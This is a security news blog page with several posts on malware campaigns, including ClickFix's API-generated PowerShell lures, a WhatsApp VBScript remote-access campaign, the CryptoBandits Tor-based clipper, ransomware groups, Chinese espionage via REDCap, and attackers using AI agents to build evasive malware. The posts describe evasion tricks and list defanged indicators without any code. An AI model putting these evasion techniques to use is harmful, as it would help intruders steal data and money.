Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label malware. Show all posts

ClickFix Investigation Exposes API-Driven Malware Across 3,000 Live Payloads


 

A growing number of ClickFix campaigns are advancing from simple social engineering operations into highly orchestrated malware delivery operations supported by dynamic infrastructure. A recent study analyzing nearly 3,000 ClickFix payloads reveals that attackers are utilizing API-based delivery systems that allow them to generate uniquely disguised malicious commands for each victim while serving the same underlying malware to all victims. 

Bert-Jan Pals conducted the analysis, which uncovered previously unknown techniques for evading Windows script inspections, thus demonstrating the deliberate efforts of threat actors to increase detection resistance and operational scalability through evasion of Windows script inspection. These findings show how what once appeared to be a straightforward clipboard-based deception has evolved into a resilient, adaptive ecosystem in which infection success is maximized despite conventional security controls being compromised. It is concerning that the findings come as ClickFix continues to gain traction as one of the most widespread social engineering exploits. 

First identified in March 2024, ClickFix has since become one of the most widely abused social engineering exploits in the cybercrime landscape. As opposed to exploiting software vulnerabilities, ClickFix exploits user trust by presenting fake browser errors, anti-bot CAPTCHA challenges, security warnings, or access restrictions that appear legitimate and gain the user's trust. 

Once the victims have completed the seemingly routine verification procedure, the attacker-supplied code is executed manually by the victim. According to Microsoft's Cyber Signals report for 2025, 47 percent of observed first-time access incidents were attributed to ClickFix-based activity, demonstrating the prevalence of deception-driven attack chains among malware operators. 

An attack sequence that transforms ordinary web pages into malware launch points is at the center of these campaigns, and it appears to be deceptively simple. It is common for attackers to compromise legitimate websites or create convincing phishing pages and substitute counterfeit CAPTCHA screens for verification prompts that require visitors to perform a series of manual tasks, including executing a command copied to the clipboard. These commands typically launch PowerShell, which retrieves and executes remote payloads, thereby enabling the deployment of information stealers and other malicious applications. 

On Windows systems, researchers observed ClickFix delivering multiple malware families, including Deepload, during the observed campaigns. Researchers have documented the use of the same technique beyond the Windows ecosystem, with the Atomic Stealer (AMOS) malware being distributed to macOS users for the first time. The technique targets browser credentials, session cookies, cryptocurrency wallets, and Apple Keychain data, illustrating its increasing cross-platform scope. 

ClickFix's popularity is largely attributed to its ability to bypass many of the security mechanisms commonly utilized by organizations. ESET's telemetry shows that ClickFix activity increased 517 percent between late 2024 and the first half of 2025 in response to this model, and Microsoft's Digital Defense Report indicates that the technique accounted for 47 percent of initial access incidents investigated by its Defender Experts team in 2025. A dedicated entry under technique T1204.004 has also been made under the MITER ATT&CK framework, recognising ClickFix as a unique form of user-assisted malicious execution, based on its increasing operational significance. 

According to Pals' investigation, the most significant evolution today is not contained on the phishing page itself but rather on backend APIs that generate payloads on demand instead of embedding static commands. Backend validation, logs, and returns a unique obfuscated command to every execution while delivering the same malware for each execution. In one test, a single server generated 100 distinct payloads over 100 requests by cycling through the following layered encoding and encryption techniques: Base64, AES, TripleDES, Rijndael, Deflate. In the absence of these protective layers, the payloads currently resolve to the same runspace script in PowerShell, but Pals cautions that the next step in the development of the technique may be per-victim payload customization. 

Using the platform, visitors can receive lures in 25 languages and are automatically tailored with payloads depending on whether they are using Windows or macOS. Further evidence of ClickFix's commercialization is provided by the findings, which extend beyond builder kits to API-driven payload generation. Additionally, Pals spotted a significant shift in execution tactics designed to minimize the effectiveness of clipboard-focused detections as well as API-driven payload generation. The newer ClickFix variants do not place the entire malicious command into the victim's clipboard, but instead download an archive into the Windows Downloads directory first and then copy only the lightweight PowerShell "orchestrator" command. 

The command is executed silently and moves the archive to a temporary location, extracts its contents, and launches the embedded PowerShell script when executed. It has also been made more discreet to execute the payload since it is separated from the clipboard command, which reduces the exposure to the Antimalware Scan Interface (AMSI). In earlier ClickFix campaigns, victims were instructed to paste commands into the Run dialog by pressing Windows+R, but in more recent operations observed throughout 2025 and into 2026, users were directed to Windows Terminal via Windows+X. 

Furthermore, the method does not create RunMRU registry artifacts commonly required for forensic investigations, which makes it appear more routine. ClickFix campaigns have undergone a significant change since moving away from static commands to API-generated payloads. In addition to maintaining the same underlying malware, attackers may also generate uniquely obfuscated commands on demand, thereby complicating signature-based detection without increasing operational complexity, thereby making campaigns more scalable and more difficult to identify through conventional security measures. The ClickFix platform has also been used by state-sponsored threat groups.

According to Proofpoint threat intelligence, a number of state-sponsored organizations incorporated ClickFix into existing intrusion workflows, including Russian APT28, Iranian MuddyWater, and North Korean Kimsuky. As part of the campaign, North Korean operators have also designed fraudulent recruitment schemes, known as ClickFake Interviews, targeting cryptocurrency professionals. Security firm Expel reported that 147,521 systems may have been compromised by a single ClearFake campaign since late August 2025, with the operational scale equally significant. 

A more valuable method of defending against malware than clipboard inspection alone is behavioral monitoring. Pals determined the most reliable indicators to be process chains originating from explorer.exe or WindowsTerminal.exe, which immediately spawned powershell.exe, cmd.exe, or msiexec.exe, followed by outbound network activity. PowerShell and cmd.exe accounted for approximately 39 percent of all observed launch methods across the analyzed dataset, followed by msiexec.exe at approximately 34 percent. 

Behavioral EDR, application control policies, and continued user awareness remain among the most effective defensive techniques. Another hunting opportunity is presented by the Downloads-folder technique, which utilizes seemingly benign one-line commands that access the Downloads directory prior to initiating concealed PowerShell execution. 

According to Pals, three active payload distribution servers were identified during the investigation - comicstar[.]lat, babybon[.]cfd, and merkantalolol[.]asia. Communication with these domains does not by itself indicate a successful compromise, but rather indicates that ClickFix commands have been delivered to a user's clipboard. Based on API-driven payload infrastructure, ClickFix is believed to have evolved into a flexible attack framework. 

A major development in cybercrime, he warns, will likely be the transition from individual payload wrappers to malware which is tailored to each target's specific needs. This evolution of ClickFix illustrates the broader shift in cybercrime towards highly adaptable, service-driven attack ecosystems that emphasize flexibility, scale, and evasion. Due to the dynamic nature of payload delivery, organizations cannot solely rely on static indicators or traditional prevention measures to protect themselves. 

The critical aspect of disrupting attacks designed to blend into legitimate activities remains the continuous monitoring of user-driven execution chains, the strengthening of application controls, and the maintenance of security awareness. The resilience of organizations will depend on the ability to detect behaviors instead of keeping up with ever-changing payloads in an environment where threat actors are constantly fine-tuning successful techniques.

WhatsApp Malware Campaign Targets Global Users Through Fake Financial Documents and Remote Access Tools

 

A widespread malware campaign is targeting WhatsApp users across several countries by sending deceptive messages containing malicious VBScript files that can ultimately grant attackers remote access to victims' systems.

According to cybersecurity researchers at Kaspersky, the threat actors behind the campaign are disguising the malicious files as legitimate business and financial documents. These files are distributed through WhatsApp accounts that have already been compromised, making the messages appear trustworthy to recipients.

Once a victim downloads and executes the attachment, a multi-stage infection process begins. The attack eventually installs ManageEngine Endpoint Central, a legitimate system management tool commonly used by IT administrators to oversee devices from a centralized platform.

Kaspersky’s telemetry data indicates that the campaign has impacted users in Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, Vietnam, and Malaysia.

The attack starts with WhatsApp messages sent from compromised accounts. These messages typically contain only a heavily obfuscated VBScript file designed to evade detection.

To increase the likelihood of users opening the attachment, the files are named to resemble invoices, financial reports, billing records, account notifications, and other business-related documents. Researchers also observed that the filenames are adapted to different languages, highlighting the global nature of the operation.

“Based on evidence collected from multiple victims through social media reports and submitted samples, we can conclude that the threat actor had gained access to several WhatsApp accounts and used them to distribute the malicious VBScript files to contacts on the compromised users’ contact lists,” Kaspersky explains.

“At the time of writing, the exact method used to compromise these WhatsApp accounts remains unknown.”

If a Windows user opens the malicious file, the VBScript downloads two additional scripts from attacker-controlled servers. These scripts modify the Windows Registry to disable User Account Control (UAC) protections and retrieve a ZIP archive containing ManageEngine Endpoint Central.

The software is then installed silently in the background and configured to connect with servers controlled by the attackers. This setup provides cybercriminals with remote administration capabilities over the compromised machine.

Researchers noted a difference in execution behavior depending on the WhatsApp platform being used. When the file is received through WhatsApp Web, it must first be downloaded before execution. However, in the WhatsApp Desktop application, the file can be launched directly through Windows Script Host (wscript.exe).

Although Kaspersky has not attributed the campaign to a specific threat actor, investigators identified indicators suggesting the use of the Chinese language and found overlaps between the campaign’s infrastructure and IP addresses previously linked to ValleyRAT and Gh0st RAT operations.

Despite these findings, researchers emphasized that the available evidence is not sufficient to confidently identify the group responsible for the attacks.

Security experts advise WhatsApp users to exercise caution when receiving files, even from known contacts, as compromised accounts can be used to spread malware.

Users should verify unexpected attachments through an alternative communication channel before opening them. Additionally, all downloaded files should be scanned with an updated antivirus solution to help detect and block potential threats before execution.

Crypto Heist Uses Fake Reputation Campaign to Spread Malware

 

Cybercriminals are increasingly borrowing the language and tactics of public relations, and a new campaign shows how effective that can be. According to researchers, attackers promoted malicious crypto-related tools by creating a polished online presence across GitHub, YouTube, VirusTotal, and other channels. The goal was not only to spread malware, but also to build an illusion of trust that would lower suspicion among users and researchers.

At the center of the operation was a Rust-based clipboard hijacker, a type of malware that watches for cryptocurrency wallet addresses copied into a victim’s clipboard. When it detects one, it swaps the address with one controlled by the attackers, causing funds to be sent to the wrong destination. This simple trick can be highly profitable because it targets users at the exact moment they think they are making a legitimate transfer. 

What makes the campaign notable is its layered distribution strategy. Researchers found dedicated phishing pages, fake GitHub and SourceForge projects, and even a YouTube channel designed to make the software look popular and credible. The channel reportedly used AI-generated narrators, suspicious view spikes, and enthusiastic comments that were likely coordinated to reinforce the appearance of real demand. Instead of relying on one channel, the attackers created a network of signals that seemed to validate one another. 

The operation also extended into reputation manipulation on security platforms. By using large numbers of fake accounts, sometimes described as “Ghost Networks,” the attackers attempted to influence systems such as VirusTotal and make their tools appear harmless or merely falsely flagged. That tactic matters because many users and even defenders glance at reputation data before deciding whether a file is safe. If the data is polluted, the warning signs become harder to trust. 

This campaign shows how malware distribution is evolving beyond obvious spam and sketchy downloads. Attackers now understand that credibility itself can be weaponized, especially when users rely on social proof, star ratings, comments, and public scans to judge safety. The result is a more convincing, more scalable deception that blends technical abuse with marketing-style manipulation. 

For users, the lesson is to treat polished packaging as a warning sign rather than reassurance. Check the source of any crypto tool carefully, verify wallet addresses before sending money, and avoid downloading software because it looks popular or well reviewed. For defenders, the case is a reminder that reputation systems can be gamed, so detection must look beyond surface-level trust signals.

CryptoBandits Malware Combines Crypto Theft and Backdoor Access

 



Microsoft has disclosed details of a newly identified Windows malware campaign that combines cryptocurrency theft, covert command-and-control communications, and remote access capabilities, creating a threat that extends well beyond traditional crypto-stealing malware.

Tracked as CryptoBandits, the malware has been active since at least February 2026 and is designed to compromise Windows systems through malicious shortcut (LNK) files. While its primary objective is to steal cryptocurrency-related information, Microsoft researchers found that the malware also functions as a lightweight backdoor, allowing attackers to maintain ongoing access to infected devices and issue remote commands.

According to Microsoft's analysis, the threat relies heavily on built-in Windows scripting technologies, including Windows Script Host and ActiveX components, to execute malicious actions while avoiding more obvious indicators typically associated with conventional malware families. Once executed, CryptoBandits deploys a portable version of the Tor anonymity network and establishes communications with attacker-controlled hidden services through a local SOCKS5 proxy, concealing the infrastructure used to manage infected systems.

Researchers observed the malware being distributed through malicious shortcut files that masquerade as legitimate content. After compromising a system, CryptoBandits deploys two distinct modules: a worm component responsible for spreading the infection and a cryptocurrency clipper designed to monitor and manipulate wallet-related data.

The propagation mechanism enables the malware to scan connected USB storage devices and generate additional malicious shortcut files that imitate legitimate documents. By replacing or disguising genuine files with weaponized shortcuts, attackers increase the likelihood that the malware will spread when removable media is shared between systems. Microsoft also noted that the malware can deploy additional payloads while excluding them from Microsoft Defender scanning, helping attackers reduce the likelihood of detection.

One of the most dangerous aspects of CryptoBandits is its clipboard-monitoring functionality. Cryptocurrency clippers are designed to watch for wallet addresses copied by victims during transactions. When a targeted wallet address is detected, the malware silently replaces it with an attacker-controlled address before the victim pastes the information into a cryptocurrency application or exchange platform. Because cryptocurrency addresses are often long and difficult to verify manually, victims may unknowingly transfer digital assets directly to criminal-controlled wallets.

Beyond address substitution, Microsoft found that the malware can harvest cryptocurrency seed phrases and private keys, information that can provide direct access to digital wallets. The malware also captures screenshots and transmits collected information to attacker-controlled infrastructure through Tor-based communications channels.

The malware establishes persistence through scheduled tasks and incorporates anti-analysis checks intended to identify whether system monitoring tools are active. Researchers observed the clipper verifying whether Windows Task Manager was running before continuing execution, a technique commonly used by malware operators attempting to evade investigation and detection.

After installation, CryptoBandits launches a renamed Tor executable and registers the infected device with its command-and-control infrastructure. The malware then continuously polls its operators for instructions at intervals of roughly 500 milliseconds, enabling rapid execution of attacker-issued commands. This capability transforms the malware from a simple financial stealer into a remotely managed backdoor capable of supporting additional malicious activity.

Microsoft's investigation also revealed extensive use of runtime obfuscation. Core malware components remain encrypted until execution, while both the Python-based installation routines and JavaScript payloads are intentionally obscured to complicate reverse engineering efforts. Such techniques make static analysis significantly more difficult and can delay detection by traditional signature-based security tools.

At the center of the operation is the malware's bundled Tor client. Rather than relying on exposed internet-facing servers, CryptoBandits routes traffic through localhost: 9050 using a SOCKS5 proxy and communicates with hidden-service infrastructure hosted within the Tor network. By concealing command-and-control traffic behind anonymized routing, attackers reduce network visibility and make infrastructure disruption efforts considerably more challenging.

The campaign gives us a foray into the new trend of financially motivated cybercrimes, where lightweight malware increasingly combines credential theft, cryptocurrency targeting, covert communications, and remote-access functionality within a single package. Security researchers have repeatedly observed threat actors moving away from easily identifiable command-and-control servers in favor of anonymized infrastructure that blends malicious traffic with legitimate network activity.

To mitigate the threat, Microsoft recommends restricting unnecessary use of scripting engines such as Windows Script Host, monitoring systems for unauthorized local SOCKS proxy activity, reviewing unusual clipboard access patterns, and implementing behavioral detection mechanisms capable of correlating script execution, network communications, process activity, and data exfiltration attempts. Additional safeguards include disabling autorun functionality for removable media, restricting execution of shortcut files from USB devices, and closely monitoring Tor-related network traffic originating from enterprise endpoints.

New Prinz Eugen Ransomware Targets Recently Modified Files First, Researchers Find

 



Security researchers have revealed a ransomware operation known as Prinz Eugen that employs an unusual file-encryption strategy designed to increase pressure on victims. According to an investigation by ThreatDown, Malwarebytes' enterprise security division, the malware gives priority to files that have been modified most recently, focusing its efforts on data that organizations are most likely to rely on for day-to-day operations.

Researchers describe the actors behind Prinz Eugen as highly interactive intruders who rely on direct involvement throughout the attack process rather than fully automated deployment methods. Instead of depending on large-scale ransomware affiliate networks, the group appears to conduct attacks manually, using legitimate administration tools and built-in system utilities to move through victim environments and maintain access.

Evidence collected during incident response investigations suggests that attackers may initially gain entry through compromised Remote Desktop Protocol (RDP) credentials. After securing access, operators manually retrieve and launch the ransomware payload, identified as servertool.exe. In one investigated intrusion, researchers observed the use of the RemotePC remote management platform, alongside the creation of a backdoor administrator account that allowed the attackers to retain access to the compromised environment.

ThreatDown noted that Prinz Eugen does not currently appear to operate under the ransomware-as-a-service model that has become common across the cybercriminal ecosystem. Researchers found no indication that the group's operators are actively recruiting affiliates or distributing their malware to external partners. Instead, available evidence points to a more centralized operation in which attacks are carried out directly by the threat actors themselves.

Although the group's data-leak platform presently displays only three victims, researchers believe the actual number of affected organizations is higher. Information gathered during investigations indicates that multiple organizations have experienced incidents linked to the ransomware. Depending on the attack, victims may face file encryption, data theft, or a combination of both. Security researchers have identified at least five organizations impacted by the operation, including an incident involving Standard Bank, where attackers reportedly demanded a ransom payment of one Bitcoin. The demand was ultimately rejected.

One of the most distinctive characteristics of Prinz Eugen is its approach to selecting files for encryption. Analysis of the malware revealed that it processes files according to modification time, encrypting the most recently changed data before moving to older content. When several files share the same timestamp, the malware follows alphabetical order to determine which file is processed next.

Researchers believe this strategy is intended to maximize operational disruption. Files that have been edited recently are often associated with ongoing business activities, active projects, financial records, or other information that employees depend on regularly. By rendering this data inaccessible first, attackers can create immediate pressure on organizations to engage with extortion demands.

Technical analysis further showed that the ransomware scans directories recursively without imposing depth restrictions. Unlike some ransomware families that avoid certain locations or system folders, the examined Prinz Eugen sample applies very few limitations. The malware attempts to encrypt virtually every accessible file it encounters, excluding only files that already carry the .prinzeugen extension, which is added to data after encryption has been completed.

The encryption mechanism itself incorporates multiple modern cryptographic components. Researchers found that the ransomware uses the ChaCha20-Poly1305 algorithm together with a 32-byte master key. Each targeted file receives its own randomly generated initialization vector, while key generation and derivation processes rely on Argon2id, SHA-256, and HKDF-SHA256. Data is encrypted in 1 MB segments, and SHA-256 hashing is used to verify file integrity throughout the process.

Investigators also identified a safeguard built into the malware's deletion routine. When operators use the – delete option, the ransomware removes original files only after confirming that the encrypted version can be successfully decrypted. This verification step reduces the likelihood of accidental data destruction that could undermine the attackers' leverage over victims.

Beyond encrypting files, Prinz Eugen incorporates measures intended to frustrate forensic investigations. Researchers observed that the malware overwrites encryption keys with zero values once they are no longer needed, triggers garbage collection routines to remove remaining traces from memory, and then attempts to delete itself from disk. These actions are designed to make post-incident analysis and key recovery efforts more difficult.

Another noteworthy aspect of the ransomware is the absence of conventional extortion artifacts. The analyzed sample contains no functionality for dropping a ransom note onto infected systems, nor does it alter the victim's desktop wallpaper to display payment instructions. While such techniques have historically been common among ransomware groups, ThreatDown researchers noted that some organized operations are increasingly shifting away from visible on-system communications.

Instead, attackers may conduct negotiations through external channels such as email correspondence, direct phone contact, or dedicated dark-web portals. By moving communications outside the compromised environment, threat actors leave behind fewer artifacts that investigators can collect and reduce opportunities for automated security tools to identify the extortion phase of an attack.

To assist defenders, ThreatDown has published a collection of indicators of compromise associated with Prinz Eugen activity. These indicators can help security teams, incident responders, and researchers identify potential infections, investigate suspicious activity, and strengthen defenses against future attacks involving the ransomware. 

INC Ransomware Climbs Into Top Tier of Cybercrime Operations, Surpasses 830 Victims

 



The ransomware operation known as INC has grown into one of the most active cybercrime groups of 2026, with security researchers linking it to more than 830 victims since it first appeared in August 2023.

According to researchers at Acronis, the group's rise coincided with disruptions affecting major ransomware brands such as LockBit and BlackCat. As affiliates sought alternative platforms, INC appears to have benefited from that shift. More than 65% of the victims listed by the group are based in the United States, with legal firms, healthcare providers, manufacturers, construction companies, and technology organizations among the most frequently targeted sectors.

Researchers also observed major changes to the ransomware itself. INC's malware for Windows and Linux/VMware ESXi systems has been rewritten in Rust, a programming language increasingly adopted by malware developers because it supports multiple operating systems and can complicate reverse-engineering efforts.

The group's toolkit has expanded as well. Recent attacks have involved a credential-stealing utility capable of extracting authentication data from newer Veeam backup deployments that use salted DPAPI encryption. Access to backup infrastructure can give attackers valuable credentials while also making recovery efforts more difficult for victims.

Acronis noted that the sale of INC's Windows and Linux ransomware variants on underground cybercrime forums in May 2024 contributed to the appearance of related ransomware families, including Lynx and Sinobi. Researchers identified significant code similarities between the groups.

Investigators found that INC affiliates rely on several entry points to compromise networks, including spear-phishing campaigns, credentials purchased from Initial Access Brokers (IABs), and the exploitation of publicly exposed systems running vulnerable versions of Citrix NetScaler, Fortinet EMS, and SimpleHelp software.

Once inside a network, attackers harvest credentials, move between systems using legitimate administrative tools such as RDP and PsExec, and attempt to weaken security controls through a technique known as Bring Your Own Vulnerable Driver (BYOVD). Researchers observed the use of vulnerable drivers including filwfp.sys, filnk.sys, and fildds.sys. The group also deploys tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer to maintain access and control compromised environments.

Before encryption begins, stolen files are collected and transferred using Rclone, often after being packaged into password-protected archives. The ransomware then encrypts systems using multithreading and partial-encryption techniques to speed up the process. When launched against VMware ESXi environments, the malware can also attempt to shut down virtual machines.

Data from ZeroFox ranked INC as the fourth most active ransomware operation during the first quarter of 2026, recording more than 120 incidents. Researchers said the group's growth demonstrates how ransomware operators can build large-scale campaigns using widely available tools, stolen credentials, and unpatched systems rather than relying on highly specialized malware.

Microsoft Exposes Malware Operation Combining USB LNK Worms and Tor-Based C2 Servers

 


A threat actor will benefit from combining cryptocurrency theft, covert communications, and remote access into a single malware framework in order to increase stealth and persistence. Microsoft has revealed the existence of a Windows-based clipper campaign active since February 2026. The clipper campaign uses a portable Tor client, Windows Script Host, and ActiveX components to communicate with a hidden command-and-control server. 

Besides intercepting and replacing cryptocurrency wallet addresses, the malware also performs continuous clipboard monitoring, captures screenshots, exfiltrates stolen data, and executes remote commands. 

A key characteristic of the operation is that it does not utilize traditional installer mechanisms or publicly exposed C2 servers and instead utilizes Tor-routed traffic as a means of concealing its activity and extends its capabilities to lightweight backdoor functions as well as financial theft. USB-Borne Infection Chain Drives Initial Compromise Upon further investigation, it was revealed that the operation is characterized by a multi-stage infection chain combining removable media propagation with credential and asset theft. 

In Microsoft's opinion, the campaign originated through malicious Windows shortcut (.LNK) files distributed through USB storage devices, enabling the malware to spread without relying on online delivery mechanisms. An infection after being executed deploys two components: a worm that propagates throughout additional removable drives, and a clipper module designed to obtain information about cryptocurrency seed phrases, private keys, and wallets. 

Obfuscation and Persistence Mechanisms Enhance Stealth As part of its propagation mechanism, the worm exploits the trust of users in familiar file formats. When it scans USB devices for commonly accessed document formats like Microsoft Word, Excel, and PDF, it conceals the original filenames and replaces them with malicious shortcuts named identically. 

In addition to increasing user interaction, this strategy masks the infection process by enabling additional payloads to be unpacked into randomly generated directories within the Public Documents path upon execution, and thereafter persistence can be established by scheduling tasks. In order to minimize the possibility of detection, the malware attempts to modify local defenses by creating antivirus exclusions for its staging locations and executable components in order to avoid detection. 

According to Microsoft, extensive efforts have been made to obstruct the process of forensic analysis, such as packaging the installer with PyInstaller and obfuscation with PyArmor, and using JavaScript-based modules with layered encryption as well as runtime decryption. This malware performs an anti-analysis check by searching for Windows Task Manager processes and terminating execution if monitoring is detected, underscoring the operator's emphasis on long-term stealth and evasion. 

Tor-Based Communications Power Clipboard Hijacking Operations Upon clearing the anti-analysis checks and activating the stealer module, the malware enters into a highly automated surveillance phase designed to detect and intercept cryptocurrency-related activity in near real-time. Microsoft observed that a Tor executable named ugate.exe is used by the component to communicate with its hidden command and control infrastructure, enabling all traffic to be routed through anonymized channels as well.

Once the malware has been installed, it periodically checks the system clipboard for a specific set of highly valuable cryptocurrency artifacts, searching for these artifacts every 500 milliseconds. Among these include 12-word and 24-word recovery phrases for Bitcoin, Ethereum private keys, Bitcoin wallet import format keys (WIF), as well as wallet addresses for Tron and Monero in addition to Bitcoin legacy, P2SH, Bech32, and Taproot formats. 

Upon detection of an identical entry, the malware silently replaces it with the address of an attacker's wallet. By carefully selecting substituted addresses to share similar leading characters or numeric patterns with the original destination, the likelihood of detection during visual verification is reduced. During the final stage of the infection, the malware emphasizes the importance of operating concealment and attacker control. 

By launching a renamed Tor executable in the background, the malware is able to identify the compromised host and register it with an external infrastructure without exposing direct network communications to the outside world. 

Upon enrollment, the infected system begins a continuous operational cycle, polling the command-and-control environment for instructions while simultaneously inspecting the clipboard contents at approximately half-second intervals to identify cryptocurrency seed phrases, private keys, and wallets. 

Also, command responses containing the EVAL directive enable the operators to execute attacker-supplied code in real-time, allowing them to expand functionality or take subsequent actions after a compromise. 

The mixture of scripting abuse, removable media propagation, and Tor-based communications indicates Microsoft's recommendation that behavioral detection strategies should be prioritized. These strategies include monitoring PowerShell-driven screen capture activity, suspicious use of WScript and CScript, and script-engine processes spawning unexpected executables, including curl, cmd.exe, PowerShell, or other unexpected executables.

Besides disabling AutoRun and AutoPlay for removable media, Group Policy controls can also be used to restrict the execution of LNK from USB devices, limiting unnecessary access to scripting engines, and monitoring clipboard monitoring and screen capture behavior on systems involving cryptocurrency or other sensitive financial transactions closely. 

Remote Code Execution Expands Malware Capabilities Researchers discovered that the campaign's data collection capabilities go beyond clipboard manipulation. A number of screenshots were taken and transferred to the command-and-control server through the native curl utility, providing operators with continuous insight into the activity of the victims. 

Furthermore, it integrates remote code execution functionality, thereby extending the framework's operational scope beyond a conventional cryptocurrency clipper. By using the EVAL command, operators can instruct the malware to retrieve additional JavaScript payloads, save them locally as cfile files, and execute them directly on the compromised host by instructing the malware to do so. 

Essentially, this capability allows the infection to become an on-demand access platform that is capable of deploying new functionality after initial compromise. Because the malware is highly obfuscated and continuously evolving, Microsoft noted that behavioral indicators offer a more reliable detection opportunity than static signatures. There are several indications that security teams should monitor suspicious activity associated with wscript.exe and cscript.exe, unexpected executions of curl, PowerShell, and cmd.exe, as well as anomalous child process chains. 

Additionally, connections directed to localhost:9050 and other indications of Tor proxy usage may provide valuable indications that this campaign was compromised. Microsoft's campaign illustrates how traditional malware techniques can be combined with anonymous infrastructure and scripting-based execution to create threats that are not only difficult to detect but also highly adaptable as cybercriminal operations continue to evolve. 

In environments characterized by removable media and digital asset transactions, the findings underscore the importance of monitoring behavioral indicators in conjunction with conventional security controls. In order to identify attacks that prioritize stealth over scale, defenders must continue to have access to unusual script activity, Tor-related communications, and clipboard manipulation.

China-Linked Cyber Espionage Group Secretly Harvested Research and Defense Emails from North American Institutions

 

A sophisticated cyber espionage campaign linked to China infiltrated research, healthcare, academic, and military organizations across North America, remaining undetected for more than a year while stealing sensitive information and defense-related communications.

According to a recent report from Google’s Threat Intelligence Group (GTIG), the campaign has been attributed with high confidence to a threat cluster identified as UNC6508. The attackers gained access through compromised REDCap (Research Electronic Data Capture) servers and later leveraged built-in Google Workspace features to quietly collect targeted emails.

The threat actor and its custom malware, known as INFINITERED, were previously highlighted by Google in February during a broader assessment of state-sponsored attacks targeting the defense industry. While the affected organizations were not publicly named, the victims reportedly included healthcare providers, universities, military medical institutions, advocacy organizations, and regulatory agencies in the United States and Canada. Google stated that it alerted impacted entities and took action against the attackers’ infrastructure.

The attackers targeted externally accessible REDCap servers, a widely used platform that helps hospitals, research institutions, and universities manage study data and databases.

Although Google has not identified the precise method used to gain initial access, nor linked the activity to a specific vulnerability or CVE, investigators observed the group scanning older REDCap versions known to contain security weaknesses.

Roughly three months after breaching the servers, UNC6508 deployed INFINITERED, a customized malware strain designed to modify REDCap system files. The malware ensured long-term persistence by embedding itself into the platform’s update process, allowing malicious code to survive future software upgrades.

INFINITERED also captured usernames and passwords entered through REDCap login portals and stored the stolen credentials in encrypted form within local databases. Additionally, the malware functioned as a backdoor, accepting commands through HTTP cookies and executing them whenever users loaded web pages.

Researchers traced the earliest known compromise to September 2023, with malicious activity continuing through November 2025. After establishing a foothold, the attackers conducted network reconnaissance, collected database and service account credentials, and eventually escalated privileges to obtain domain administrator access.

Rather than deploying a separate data-exfiltration tool, the attackers exploited an existing Google Workspace administrative capability known as content compliance rules.

These rules are typically used by organizations to monitor emails for specific keywords and automatically apply actions such as forwarding or copying messages. UNC6508 created a malicious rule named "Patroit" that monitored nearly 150 keywords, email addresses, and search terms associated with its intelligence-gathering objectives.

Whenever an email matched the predefined criteria, Google Workspace automatically sent a hidden copy to an attacker-controlled Gmail account. Google has since disabled the account involved in the operation.

This technique allowed the threat actors to collect sensitive communications without installing malware on mail servers or generating suspicious network traffic. Instead, they relied entirely on legitimate cloud-based functionality to siphon information.

While email-forwarding rule abuse is already recognized within the MITRE ATT&CK framework, GTIG noted that using domain-level content compliance rules for espionage represented a previously unseen tactic among China-linked cyber actors.

Analysis of the monitoring rules revealed that UNC6508 was particularly interested in subjects related to geopolitical strategy, military technologies and equipment, artificial intelligence, autonomous and uncrewed systems, offensive cyber operations, and medical research.

One especially notable keyword was "chikungunya," a mosquito-borne disease linked to a significant outbreak in China's Guangdong province during 2025, suggesting the group's collection interests extended into public health and epidemiological research.

Security teams are advised to immediately update internet-facing REDCap servers and completely remove outdated software versions. Because REDCap allows multiple versions to operate simultaneously, legacy installations can create opportunities for downgrade attacks that exploit known vulnerabilities.

Organizations should also review Google Workspace and other cloud email environments for unusual content compliance rules, unauthorized mail forwarding settings, and external BCC destinations. Administrative audit logs should be examined to identify when rule changes occurred and who made them.

Google has also published indicators of compromise associated with INFINITERED, which defenders can use to search for signs of intrusion within their environments. Implementing phishing-resistant multi-factor authentication (MFA) for administrator accounts is another critical step, as the email theft operation ultimately depended on obtaining elevated administrative privileges.

Although investigators have not yet determined exactly how UNC6508 initially compromised the REDCap servers, the campaign demonstrates how legitimate cloud administration features can be weaponized once attackers gain sufficient access. As a result, organizations must monitor not only malware and network activity but also the misuse of trusted enterprise tools that can quietly facilitate data theft.

AI-Assisted Malware Lab Found Testing Ways to Evade Security Tools, Sophos Reports

 



Researchers at cybersecurity firm Sophos have uncovered a malware development framework that uses artificial intelligence tools to speed up the creation and testing of ransomware-related software designed to avoid detection by security products.

The investigation began after Sophos analysts discovered suspicious files on a customer system. What initially appeared to be a collection of penetration-testing tools soon revealed signs of criminal activity, including references to ransom notes and organizations listed on ransomware leak sites.

According to Sophos, the framework combines traditional attack tools with AI-assisted development workflows. Researchers found evidence that the operators used coding assistants such as Cursor and Claude Opus during different stages of development, including writing code, reviewing results, refining payloads, and researching techniques that could help malware evade security controls.

One of the framework's primary goals was to bypass Endpoint Detection and Response (EDR) platforms. These security products are designed to identify malicious activity on computers and servers, often detecting attacks that traditional antivirus software might miss.

The toolkit contained several components intended to reduce the chances of detection. Among them were customized Cobalt Strike profiles that made malicious network traffic resemble ordinary web browsing activity, communication channels that routed commands through Telegram, and malware development scripts capable of injecting malicious code into legitimate Windows applications while allowing those programs to continue functioning normally.

Researchers also identified the use of a Cloudflare Worker that acted as an intermediary between infected systems and attacker-controlled infrastructure. This setup can make it more difficult for defenders to identify the true location of command-and-control servers.

A particularly notable feature of the framework was an automated Active Directory discovery system. Active Directory is widely used in enterprise networks to manage users, computers, permissions, and other resources. Because it contains valuable information about an organization's internal structure, attackers frequently attempt to map Active Directory environments after gaining access to a network.

Sophos found that the discovery process relied on a series of AI-assisted agents that gathered information, assessed results, selected follow-up actions, and continued the investigation of the network. Rather than requiring a human operator to manually perform every step, parts of the reconnaissance process could be carried out through predefined automated workflows.

The framework itself appeared to operate through multiple specialized AI agents assigned to different tasks. Sophos reported that one agent coordinated the overall development process while others focused on testing, documentation, operational security improvements, virtual machine deployment, proxy testing, and malware evaluation.

Researchers also discovered that some agents had been tasked with examining publicly available security research. The system collected information from technical reports and research publications, extracted details about detection-evasion methods, mapped those techniques to the MITRE ATT&CK framework, recreated testing environments, and documented the results.

At the center of the operation was a Python-based payload generation tool. This component produced malware written primarily in Rust and Go while combining encryption, execution techniques, and anti-analysis measures intended to make detection more difficult. Sophos observed nearly 80 generated modules being tested against more than 70 separate evasion methods.

